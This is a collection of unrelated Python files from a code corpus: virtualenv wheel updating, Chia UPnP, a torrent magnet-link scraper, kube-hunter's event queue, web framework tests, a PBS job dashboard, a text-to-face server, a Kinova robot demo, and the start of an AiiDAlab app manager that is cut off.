try:
upload_time = content["releases"][wheel.version][0]["upload_time"]
return datetime.strptime(upload_time, "%Y-%m-%dT%H:%M:%S")
except Exception as exception:
logging.error("could not load release date %s because %r", content, exception)
return None
def _request_context():
yield None
# fallback to non verified HTTPS (the information we request is not sensitive, so fallback)
yield ssl._create_unverified_context() # noqa
_PYPI_CACHE = {}
def _pypi_get_distribution_info_cached(distribution):
if distribution not in _PYPI_CACHE:
_PYPI_CACHE[distribution] = _pypi_get_distribution_info(distribution)
return _PYPI_CACHE[distribution]
def _pypi_get_distribution_info(distribution):
content, url = None, "https://pypi.org/pypi/{}/json".format(distribution)
try:
for context in _request_context():
try:
with urlopen(url, context=context) as file_handler:
content = json.load(file_handler)
break
except URLError as exception:
logging.error("failed to access %s because %r", url, exception)
except Exception as exception:
logging.error("failed to access %s because %r", url, exception)
return content
def manual_upgrade(app_data):
threads = []
for for_py_version, distribution_to_package in BUNDLE_SUPPORT.items():
# load extra search dir for the given for_py
for distribution in distribution_to_package.keys():
thread = Thread(target=_run_manual_upgrade, args=(app_data, distribution, for_py_version))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def _run_manual_upgrade(app_data, distribution, for_py_version):
start = datetime.now()
from .bundle import from_bundle
current = from_bundle(
distribution=distribution,
version=None,
for_py_version=for_py_version,
search_dirs=[],
app_data=app_data,
do_periodic_update=False,
)
logging.warning(
"upgrade %s for python %s with current %s",
distribution,
for_py_version,
"" if current is None else current.name,
)
versions = do_update(
distribution=distribution,
for_py_version=for_py_version,
embed_filename=current.path,
app_data=app_data,
search_dirs=[],
periodic=False,
)
msg = "upgraded %s for python %s in %s {}".format(
"new entries found:\n%s" if versions else "no new versions found",
)
args = [
distribution,
for_py_version,
datetime.now() - start,
]
if versions:
args.append("\n".join("\t{}".format(v) for v in versions))
logging.warning(msg, *args)
__all__ = (
"periodic_update",
"do_update",
"manual_upgrade",
"NewVersion",
"UpdateLog",
"load_datetime",
"dump_datetime",
"trigger_update",
"release_date_for_wheel_path",
)
|
upnp.py | import logging
import threading
from queue import Queue
from typing import Optional
try:
import miniupnpc
except ImportError:
pass
log = logging.getLogger(__name__)
class UPnP:
thread: Optional[threading.Thread] = None
queue: Queue = Queue()
def __init__(self):
def run():
try:
self.upnp = miniupnpc.UPnP()
self.upnp.discoverdelay = 30
self.upnp.discover()
self.upnp.selectigd()
keep_going = True
while keep_going:
msg = self.queue.get()
if msg[0] == "remap":
port = msg[1]
log.info(f"Attempting to enable UPnP (open up port {port})")
try:
self.upnp.deleteportmapping(port, "TCP")
except :
log.info("Removal of previous portmapping failed. This does not indicate an error")
self.upnp.addportmapping(port, "TCP", self.upnp.lanaddr, port, "chia", "")
log.info(
f"Port {port} opened with UPnP. lanaddr {self.upnp.lanaddr} "
f"external: {self.upnp.externalipaddress()}"
)
elif msg[0] == "release":
port = msg[1]
log.info(f"UPnP, releasing port {port}")
self.upnp.deleteportmapping(port, "TCP")
log.info(f"UPnP, Port {port} closed")
elif msg[0] == "shutdown":
keep_going = False
except Exception as e:
log.info(
"UPnP failed. This is not required to run chia, it allows incoming connections from other peers."
)
log.info(e)
self.thread = threading.Thread(target=run)
self.thread.start()
def remap(self, port):
self.queue.put(("remap", port))
def release(self, port):
self.queue.put(("release", port))
def shutdown(self):
if not self.thread:
return
self.queue.put(("shutdown",))
log.info("UPnP, shutting down thread")
self.thread.join()
self.thread = None
# this is here just in case the UPnP object is destroyed non-gracefully,
# e.g. via an exception before the main thread can call shutdown()
def __del__(self):
self.shutdown()
|
magnet.py | # coding: utf-8
import re, os
import time
from queue import Queue
import threading
from app.utils.func_requests import get_html_html
from bs4 import BeautifulSoup
from jinja2 import PackageLoader,Environment
def sukebei_findindex(searchid):
url = 'https://sukebei.nyaa.si/?q={}'.format(searchid)
r = get_html_html(url)
html = r.html.html
#titleall = r.html.find('td:nth-child(2)>a:nth-child(1)')
#maglink = r.html.find('td:nth-child(3)>a:nth-last-child(1)')
#sizeall = r.html.find('td:nth-child(4)')
soup = BeautifulSoup(html,'lxml')
titleall = soup.find('tbody').find_all('a',href=re.compile('view'))
title = re.findall(r'<a href=\"(/view/\d+)\" title=\"(.*?)\">.*?</a>',str(titleall))
searchdata = {}
urlint = 0
for i in title:
searchdata[i[1]] = 'https://sukebei.nyaa.si' + i[0]
urlint += 1
#magnetall = soup.find('tbody').find_all('a',href=re.compile('magnet'))
#magnet = re.findall(r'''<a href=\"(magnet:\?xt=urn:btih:.*?)\"><i class=\"fa fa-fw fa-magnet\"></i></a>''',str(magnetall))
#searchdata['magnet'] = magnet
#sizeall = soup.find('tbody').find_all('td',attrs = {'class' : 'text-center'})
#size = re.findall(r'<td class=\"text-center\">([\d.]*?) ([GiBMiBBytes]*?)</td>',str(sizeall))
return (searchdata, urlint)
def producer(in_q, titledata):
for i in titledata:
in_q.put(titledata[i])
def sukebei_one(in_q, jsondata):
url = in_q.get()
#url = 'https://sukebei.nyaa.si/view/3039545'
time.sleep(2)
r = get_html_html(url)
html = r.html.html
soup = BeautifulSoup(html,'lxml')
onedata = {}
nolike = 0
onedata['url'] = url
try:
title = soup.find('h3', attrs={'class' : 'panel-title'}).string.replace('\n','').replace('\t','').replace('+','').replace(' ','').replace('[','').replace(']','')
onedata['title'] = title
except:
onedata['title'] = '---'
nolike = 1
try:
magnetall = soup.find('div', attrs={'class' : 'panel-footer clearfix'})
magnet = re.findall(r'''(magnet:\?xt=urn:btih:.*?)\"><i class=\"fa fa-magnet fa-fw\">''',str(magnetall))[0]
onedata['magnet'] = magnet
except:
onedata['magnet'] = '---'
nolike = 1
try:
sizeall = soup.find('div', attrs={'class' : 'panel-body'})
size = re.findall(r'<div class=\"col-md-1\">File size:</div>[\s\S]*?div class=\"col-md-5\">(.*?)</div>',str(sizeall))
onedata['size'] = size[0]
except:
onedata['size'] = '---'
nolike = 1
try:
fileindexall = soup.find('div', attrs={'class' : 'torrent-file-list panel-body'})
fileindex_1 = re.findall(r'<li><i class=\"fa fa-file\"></i>(.*?) <span class=\"file-size\">\(.*?\)</span></li>',str(fileindexall))
fileindex = ','.join(fileindex_1)
onedata['fileindex'] = fileindex
except:
onedata['fileindex'] = '---'
nolike = 1
try:
strfileindex = ''.join(fileindex_1)
except:
pass
try:
nolike_list = ["第一会所","宣传","論壇","澳门皇冠赌场","0.85或以上版本","魔王","赌场"]
for i in nolike_list:
if i in strfileindex:
nolike = 1
break
except:
nolike = 1
if nolike == 0:
#print(onedata)
jsondata.append(onedata)
in_q.task_done()
def sukebei_thread(searchid):
start = time.time()
#searchlist = searchid.split(',')
#print(searchlist)
#leng2 = len(searchlist)
titledata, urlint = sukebei_findindex(searchid)
queue = Queue()
jsondata = []
producer_thread = threading.Thread(target=producer, args=(queue,titledata))
#producer_thread.daemon = True
producer_thread.start()
for i in range(1,int(urlint)+1):
consumer_thread = threading.Thread(target=sukebei_one, args=(queue, jsondata))
consumer_thread.daemon = True
consumer_thread.start()
queue.join()
end = time.time()
usetime = str(end - start)
return (jsondata,usetime)
def template_magnet(alldataa,usetimee,searchidd):
#print(ciddataa_performers)
env = Environment(loader=PackageLoader(__name__,"templates")) # 创建一个包加载器对象
template = env.get_template('magnet.md') # 获取一个模板文件
temp_out = template.render(alldata = alldataa,usetime = usetimee, searchid = searchidd)
#print(temp_out) # 渲染
return (temp_out)
def sukebei(searchid):
alldata, usetime = sukebei_thread(searchid)
temp_out = template_magnet(alldata, usetime,searchid)
return temp_out
if __name__ == "__main__":
print(sukebei('SSNI-848'))
|
handler.py | import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import get_config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue):
def __init__(self, num_worker=10):
super().__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
config = get_config()
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
config = get_config()
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
test_tools.py | import unittest
from multiprocessing import Process
from threading import Thread
from lib.sushi.tools import HttpMethod
from lib.sushi.tools.utils import Query
from ..sushi.tools import parameter, expose, application
def pi():
return 3.1415
def square(x):
return x * x
def pow(x, y):
return pow(x, y)
class TestParameter(unittest.TestCase):
def test_parameter_to_store_params_in_decorator(self):
wrapped_square = parameter(name="x")(square)
params = wrapped_square.params
self.assertEqual(len(params), 1)
self.assertEqual(params[0], Query(name="x", default=None, cls=str))
def test_parameter_to_raise_error_if_param_unknown(self):
self.assertRaises(ValueError, parameter(name="y"), square)
def test_parameter_to_store_params_in_decorator_with_type(self):
wrapped_square = parameter(name="x", cls=int)(square)
params = wrapped_square.params
self.assertEqual(len(params), 1)
self.assertEqual(params[0], Query(name="x", default=None, cls=int))
def test_parameter_to_store_params_in_decorator_with_default(self):
wrapped_square = parameter(name="x", default="y/m - c")(square)
params = wrapped_square.params
self.assertEqual(len(params), 1)
self.assertEqual(params[0], Query(name="x", default="y/m - c", cls=str))
def test_parameter_to_wrap_parameter_wrapped_function(self):
wrapped_pow = parameter(name="y", cls=int)(parameter(name="x", cls=int)(pow))
params = wrapped_pow.params
self.assertEqual(len(params), 2)
self.assertEqual(params[0], Query(name="x", default=None, cls=int))
self.assertEqual(params[1], Query(name="y", default=None, cls=int))
class TestExpose(unittest.TestCase):
def test_expose_without_params(self):
w = expose(path="/")(pi)
self.assertEquals(w.path, "/")
self.assertEquals(w.method, HttpMethod.GET)
self.assertEquals(w.params, [])
self.assertEquals(w.func, pi)
def test_expose_without_params_with_method(self):
w = expose(path="/pi", method=HttpMethod.POST)(pi)
self.assertEquals(w.path, "/pi")
self.assertEquals(w.method, HttpMethod.POST)
self.assertEquals(w.params, [])
self.assertEquals(w.func, pi)
def test_expose_with_params_with_method(self):
w = expose(path="/square")(parameter(name="x")(square))
self.assertEquals(w.path, "/square")
self.assertEquals(w.method, HttpMethod.GET)
self.assertEquals(w.params, [Query(name="x", default=None, cls=str)])
self.assertEquals(w.func, square)
def test_params_with_expose(self):
self.assertRaises(ValueError, parameter(name="y"), expose(path="/square")(square))
@application()
class Simple(object):
@expose("/")
@parameter(name="name")
def greet(self, name):
return "Hello " + name
class TestApplication(unittest.TestCase):
p = Process(target=lambda: Simple().run())
@classmethod
def setUpClass(cls):
cls.p.start()
@classmethod
def tearDownClass(cls):
cls.p.terminate()
def test_simple_application(self):
import urllib.request
contents = urllib.request.urlopen("http://localhost:8080/_/health").read()
self.assertEquals(contents, b'OK')
def test_simple_application_method(self):
import urllib.request
contents = urllib.request.urlopen("http://localhost:8080/").read()
self.assertEquals(contents, b'Hello')
|
telemetry_dashboard.py | from IPython.core.display import HTML
from IPython.display import display, Image
import ipywidgets as widgets
import subprocess
import threading
import time
import os
from .query_nodes import getFreeJobSlots
loader = '''<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
.loader {
border: 16px solid #f3f3f3;
border-radius: 50%;
border-top: 16px solid #3498db;
width: 20px;
height: 20px;
-webkit-animation: spin 2s linear infinite; /* Safari */
animation: spin 2s linear infinite;
}
@-webkit-keyframes spin {
0% { -webkit-transform: rotate(0deg); }
100% { -webkit-transform: rotate(360deg); }
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
</style>
</head>
<body>
<div class="loader"></div>{status}
</body>
</html>
'''
class DashboardLauncher():
def __init__(self, command, search_url, display_name, duration, queue, node_property, one_use_token = False):
self.command = command
self.pointer = search_url
self.name = display_name
self.duration = duration
self.start_button = widgets.Button(description='Start Application', disabled=False, button_style='info')
self.stop_button = widgets.Button(description='Stop Application', disabled=False, button_style='info')
self.status = widgets.HTML(value='')
self.one_use_token = one_use_token
prev_job, job_id = self.jobsRunning(queue)
if prev_job == True:
self.new_job = False
self.jobid = job_id
self.status.value = loader.replace('{status}', f"Loading {self.name}.<br>JOB ID = {self.jobid}")
self.detectURL()
self.display_box = widgets.VBox([self.stop_button, self.status])
else:
self.new_job = True
self.display_box = widgets.VBox([self.start_button, self.status])
def on_start_clicked(b):
self.status.value = "Loading ..."
queue_server = os.getenv('PBS_DEFAULT')
match_properties = [node_property]
available_slots, free_slots = getFreeJobSlots(queue_server, match_properties, verbose=False)
if free_slots == 0 :
self.status.value = f"All nodes are currently in use and the {display_name} cannot be launched at this time. Please try again in a few minutes."
self.display_box.children = [self.start_button, self.status]
else:
self.new_job = True
self.stop_button.disabled = False
self.display_box.children = [self.stop_button, self.status]
self.submitDashboardJob()
def on_stop_clicked(b):
self.stop_button.disabled = True
self.cancelJob()
self.status.value = f'{self.name} job terminated'
self.display_box.children = [self.start_button, self.status]
self.start_button.on_click(on_start_clicked)
self.stop_button.on_click(on_stop_clicked)
display(self.display_box)
def jobsRunning(self, queue_name):
command = f'qstat {queue_name}'
p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
output, error = p.communicate()
jobs = output.decode("utf-8")
if jobs == '':
return False, ""
else:
return True, jobs.rsplit("\n")[2].rsplit(".")[0]
def submitDashboardJob(self):
p = subprocess.Popen(self.command, stdout=subprocess.PIPE, shell=True)
output, error = p.communicate()
self.jobid = output.decode("utf-8").rstrip().split('.')[0]
if self.jobid == "":
self.status.value = f"<span style='color:red'>⚠</span> Launching {self.name} failed"
self.display_box.children = [self.start_button, self.status]
return
else:
self.status.value = loader.replace('{status}', f"Initializing and loading {self.name}. This will take approximately {self.duration}.<br>JOB ID = {self.jobid}")
self.detectURL()
def detectURL(self):
op_cmd = [f'qpeek {self.jobid}']
def _work():
url_detected = False
str_ = self.pointer
while not url_detected:
p = subprocess.Popen(op_cmd, stdout=subprocess.PIPE, shell=True)
output,_ = p.communicate()
output = output.decode().split('\n')
time.sleep(3.0)
if output == ['']:
p2 = subprocess.Popen([f'qstat {self.jobid}'], stdout=subprocess.PIPE, shell=True)
jobstatus,_ = p2.communicate()
if jobstatus == b'':
self.status.value = f'{self.name} session terminated'
self.display_box.children = [self.start_button, self.status]
return
for x in output:
if str_ in x:
url_detected = True
url = x.rstrip()
url_return = url.split("token")[0] if self.one_use_token else url
#if self.new_job == True:
# self.redirectURL(url)
self.status.value = f'{self.name} successfully initialized.<br><a href="{url}" target="_blank">Launch {self.name} (for the first time).</a><br><a href="{url_return}" target="_blank">Return to {self.name} session (if previously closed).</a><br>JOB ID = {self.jobid}'
break
thread = threading.Thread(target=_work, args=())
thread.start()
def redirectURL(self, URL):
self.time_created = time.time()*1000
script = new_tab =f'''<script>
var d = new Date();
var time_now = d.getTime();
var timeout = 7000;
if (time_now - {self.time_created} < timeout) {{
var win = window.open('{URL}', '_blank');
}}
</script>'''
new_tab = HTML ('''{}'''.format(script))
display(new_tab)
def cancelJob(self):
status = loader.replace("{status}",f"Cancelling {self.name} job")
cmd = f'qdel {self.jobid}'
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output, err = p.communicate()
cmd = 'qstat '+self.jobid
cancelled = False
while not cancelled:
self.status.value = status+f'<br>JOB ID = {self.jobid}'
self.display_box.children = [self.stop_button, self.status]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output,_ = p.communicate()
cancelled = True if output.decode().rstrip() == '' else False
time.sleep(7.0)
return
|
text2face.py | import os
import csv
import json
import numpy as np
import tensorflow as tf
from scipy.io import wavfile
from python_speech_features import mfcc
import eventlet
import socketio
import threading
from google.cloud import texttospeech
import base64
sio = socketio.Server()
app = socketio.WSGIApp(sio)
text = ""
@sio.event
def connect(sid, environ):
print('connect', sid)
@sio.event
def chat(sid, data):
print('chat: ' + data)
sio.emit('chat', data)
@sio.event
def disconnect(sid):
print('disconnect', sid)
def program():
global text
while True:
text = str(input())
def text2face(text):
filepath, filepath_high = text2speech(text) #"C:\\Users\\frank\\Desktop\\Uni\\HiWi\\sampled_test.wav"
audio_fps = 8000
audio_sample_size = int(audio_fps / 4) # 250ms
def slideWindow(a, size, step):
b = []
i = 0
pos = 0
while pos + size < len(a):
pos = int(i * step)
b.append(a[pos : pos + size])
i+=1
return b
def getAudio(path, size = audio_sample_size, step = 1000):
out = []
sr, y = wavfile.read(path)
samples = slideWindow(y, size, step)
for sample in samples:
out.append(mfcc(sample, audio_fps))
print(path, sr, len(out))
return out[:-1] # last one is not full
model = tf.keras.models.load_model('AI\\speech2face_cnn')
audio = getAudio(filepath, step=audio_sample_size)
input = np.asarray(audio)
input = (input - np.min(input)) / np.ptp(input)
decoded = model.predict(np.expand_dims(input, axis=3))
keyframes = np.concatenate(decoded)
blendshapes = ["jawOpen", "mouthClose", "mouthFunnel", "mouthPucker", "mouthRight", "mouthLeft", "mouthSmileRight", "mouthSmileLeft", "mouthFrownRight", "mouthFrownLeft", "mouthDimpleRight", "mouthDimpleLeft", "mouthStretchRight", "mouthStretchLeft", "mouthRollLower", "mouthRollUpper", "mouthShrugLower", "mouthShrugUpper", "mouthPressRight", "mouthPressLeft", "mouthLowerDownRight", "mouthLowerDownLeft", "mouthUpperUpRight"]
with open(filepath + "-frames.csv", 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(blendshapes)
for row in keyframes:
writer.writerow(row)
return (keyframes, filepath_high)
def text2speech(text):
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "key.json"
client = texttospeech.TextToSpeechClient()
synthesis_input = texttospeech.SynthesisInput(text=text)
voice = texttospeech.VoiceSelectionParams(
language_code="de-DE", ssml_gender=texttospeech.SsmlVoiceGender.MALE
)
audio_config = texttospeech.AudioConfig(
audio_encoding=texttospeech.AudioEncoding.LINEAR16,
speaking_rate=0.8
)
audio_config_low = texttospeech.AudioConfig(
audio_encoding=texttospeech.AudioEncoding.LINEAR16,
sample_rate_hertz=8000,
speaking_rate=0.8
)
response = client.synthesize_speech(
input=synthesis_input, voice=voice, audio_config=audio_config
)
with open("output.wav", "wb") as out:
out.write(response.audio_content)
print('Audio content written to file "output.wav"')
response_low = client.synthesize_speech(
input=synthesis_input, voice=voice, audio_config=audio_config_low
)
with open("output_low.wav", "wb") as out:
out.write(response_low.audio_content)
print('Audio content written to file "output_low.wav"')
return ("output_low.wav", "output.wav")
def readfile(path):
with open(path, "rb") as data:
return data.read()
def mat2string(mat):
text = ""
for line in mat:
text += ','.join(['%.5f' % num for num in line]) + "\n"
return text[:-1]
def worker():
global text
while True:
if (text):
sio.emit("chat", text)
face, audio = text2face(text)
face_enc = mat2string(face)
audio_enc = readfile(audio)
print("Sending face and audio data...")
sio.emit('face', face_enc)
sio.emit('audio', audio_enc)
text = ""
sio.sleep(1)
threading.Thread(target=program).start()
sio.start_background_task(worker)
eventlet.wsgi.server(eventlet.listen(('localhost', 8080)), app) |
move_closer.py | #!/usr/bin/env python
"""--------------------------------------------------------------------
Copyright (c) 2018, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\Author Longfei Zhao
\brief Demo prepared for Movo2
\Platform: Ubuntu 16.04 LTS / ROS Kinetic
--------------------------------------------------------------------"""
import threading
import numpy
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import String
from movo.system_defines import TRACTOR_REQUEST
from movo_msgs.msg import ConfigCmd
from movo_msgs.msg import FaceFound
from movo_action_clients.move_base_action_client import MoveBaseActionClient
from geometry_msgs.msg import Pose2D
class MoveCloser:
def __init__(self):
self._stop_dist = 1.0
is_sim = rospy.get_param("~sim", False)
self._movo_base = MoveBaseActionClient(sim=is_sim, frame="odom")
self._nearest_face = Pose2D(x=0.0, y=0.0, theta=0.0)
self._has_pose_target = False
self._nearest_face_mutex = threading.Lock()
self._move_base_thread = threading.Thread(target = self._move_base_thread_cb)
self._move_base_thread.start()
self._nearest_face_sub = rospy.Subscriber("/face_detector/nearest_face", FaceFound, self._nearest_face_cb)
rospy.loginfo("Follow Me initialization finished")
rospy.spin()
"""
Update base target according to found nearest face.
"""
def _nearest_face_cb(self, msg):
# run only once to update target pose
if not self._has_pose_target:
rospy.sleep(0.001)
with self._nearest_face_mutex:
self._nearest_face.x = msg.face_dist * numpy.cos(msg.tilt_pose) * numpy.cos(-msg.pan_pose)
self._nearest_face.y = msg.face_dist * numpy.cos(msg.tilt_pose) * numpy.sin(-msg.pan_pose)
# self._nearest_face.z = msg.face_dist * numpy.sin(msg.tilt_pose)
self._nearest_face.theta = -msg.pan_pose
self._has_pose_target = True
rospy.loginfo("[pan_pose, tilt_pose, dist_of_face] is [%f, %f, %f] " %( msg.pan_pose, msg.tilt_pose, msg.face_dist) )
self._nearest_face_sub.unregister()
def _move_base_thread_cb(self):
rate = rospy.Rate(10)
while (not self._has_pose_target) and (not rospy.is_shutdown()):
rospy.logdebug("wait for new target accepted " )
rate.sleep()
pass
base_target = Pose2D(x=self._nearest_face.x - self._stop_dist * numpy.cos(self._nearest_face.theta),
y=self._nearest_face.y - self._stop_dist * numpy.sin(self._nearest_face.theta),
theta=self._nearest_face.theta)
rospy.loginfo("send movo base to [x, y, theta] is [%f, %f, %f] "%(base_target.x, base_target.y, base_target.theta) )
self._movo_base.goto(base_target)
rospy.sleep(10.0)
if __name__ == "__main__":
rospy.loginfo("start Move Closer")
# rospy.init_node("move_closer", log_level=rospy.DEBUG)
rospy.init_node("move_closer", log_level=rospy.INFO)
MoveCloser()
|
app.py | # -*- coding: utf-8 -*-
"""Module to manage AiiDAlab apps."""
import re
import os
import shutil
import json
import errno
import logging
from collections import defaultdict
from contextlib import contextmanager
from enum import Enum, auto
from time import sleep
from threading import Thread
from subprocess import check_output, STDOUT
from dataclasses import dataclass, field, asdict
from urllib.parse import urlsplit, urldefrag
from typing import List, Dict
import traitlets
from dulwich.porcelain import fetch
from dulwich.errors import NotGitRepository
from dulwich.objects import Tag, Commit
from packaging.requirements import Requirement
from packaging.specifiers import SpecifierSet, InvalidSpecifier
from packaging.version import parse
from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEventHandler
from .config import AIIDALAB_DEFAULT_GIT_BRANCH
from .git_util import GitManagedAppRepo as Repo
from .utils import throttled
from .utils import find_installed_packages
class AppNotInstalledException(Exception):
pass
class AppRemoteUpdateError(RuntimeError):
pass
# A version is usually of type str, but it can also be a value
# of this Enum to indicate special app states in which the
# version cannot be determined, e.g., because the app is in a
# detached state, or because the app is not installed at all.
class AppVersion(Enum):
UNKNOWN = auto()
NOT_INSTALLED = auto()
class AiidaLabAppWatch:
"""Watch to monitor the app installation status.
Create a watch instance to monitor the installation status of an
AiiDAlab app. This is achieved by monitoring the app repository
for existance and changes.
Arguments:
app (AiidaLabApp):
The AiidaLab app to monitor.
"""
class AppPathFileSystemEventHandler(FileSystemEventHandler):
"""Internal event handeler for app path file system events."""
def __init__(self, app):
self.app = app
def on_any_event(self, event):
"""Refresh app for any event."""
self.app.refresh_async()
def __init__(self, app):
self.app = app
self._started = False
self._monitor_thread = None
self._observer = None
def __repr__(self):
return f"<{type(self).__name__}(app={self.app!r})>"
def _start_observer(self):
"""Start the directory observer thread.
The ._observer thread is controlled by the ._monitor_thread.
"""
assert os.path.isdir(self.app.path)
assert self._observer is None or not self._observer.isAlive()
event_handler = self.AppPathFileSystemEventHandler(self.app)
self._observer = Observer()
self._observer.schedule(event_handler, self.app.path, recursive=True)
try:
self._observer.start()
except OSError as error:
if error.errno in (errno.ENOSPC, errno.EMFILE) and "inotify" in str(error):
# We reached the inotify watch limit, using polling-based fallback observer.
self._observer = PollingObserver()
self._observer.schedule(event_handler, self.app.path, recursive=True)
self._observer.start()
else: # reraise unrelated error
raise error
def _stop_observer(self):
"""Stop the directory observer thread.
The ._observer thread is controlled by the ._monitor_thread.
"""
assert self._observer is not None
self._observer.stop()
def start(self):
"""Watch the app repository for file system events.
The app state is refreshed automatically for all events.
"""
if self._started:
raise RuntimeError(
f"Instances of {type(self).__name__} can only be started once."
)
if self._monitor_thread is None:
def check_path_exists_changed():
is_dir = os.path.isdir(self.app.path)
while not self._monitor_thread.stop_flag:
switched = is_dir != os.path.isdir(self.app.path)
if switched:
is_dir = not is_dir
self.app.refresh()
if is_dir:
if self._observer is None or not self._observer.isAlive():
self._start_observer()
elif self._observer and self._observer.isAlive():
self._stop_observer()
sleep(1)
# stop-flag set, stopping observer...
if self._observer:
self._observer.stop()
self._monitor_thread = Thread(target=check_path_exists_changed)
self._monitor_thread.stop_flag = False
self._monitor_thread.start()
self._started = True
def stop(self):
"""Stop watching the app repository for file system events."""
if self._monitor_thread is not None:
self._monitor_thread.stop_flag = True
def is_alive(self):
"""Return True if this watch is still alive."""
return self._monitor_thread and self._monitor_thread.is_alive()
def join(self, timeout=None):
"""Join the watch after stopping.
This function will timeout if a timeout argument is provided. Use the
is_alive() function to determien whether the watch was stopped within
the given timout.
"""
if self._monitor_thread is not None:
self._monitor_thread.join(timeout=timeout)
class AiidaLabApp(traitlets.HasTraits):
"""Manage installation status of an AiiDAlab app.
Arguments:
name (str):
Name of the Aiida lab app.
app_data (dict):
Dictionary containing the app metadata.
aiidalab_apps_path (str):
Path to directory at which the app is expected to be installed.
watch (bool):
If true (default), automatically watch the repository for changes.
"""
path = traitlets.Unicode(allow_none=True, readonly=True)
install_info = traitlets.Unicode()
available_versions = traitlets.List(traitlets.Unicode)
installed_version = traitlets.Union(
[traitlets.Unicode(), traitlets.UseEnum(AppVersion)]
)
updates_available = traitlets.Bool(readonly=True, allow_none=True)
busy = traitlets.Bool(readonly=True)
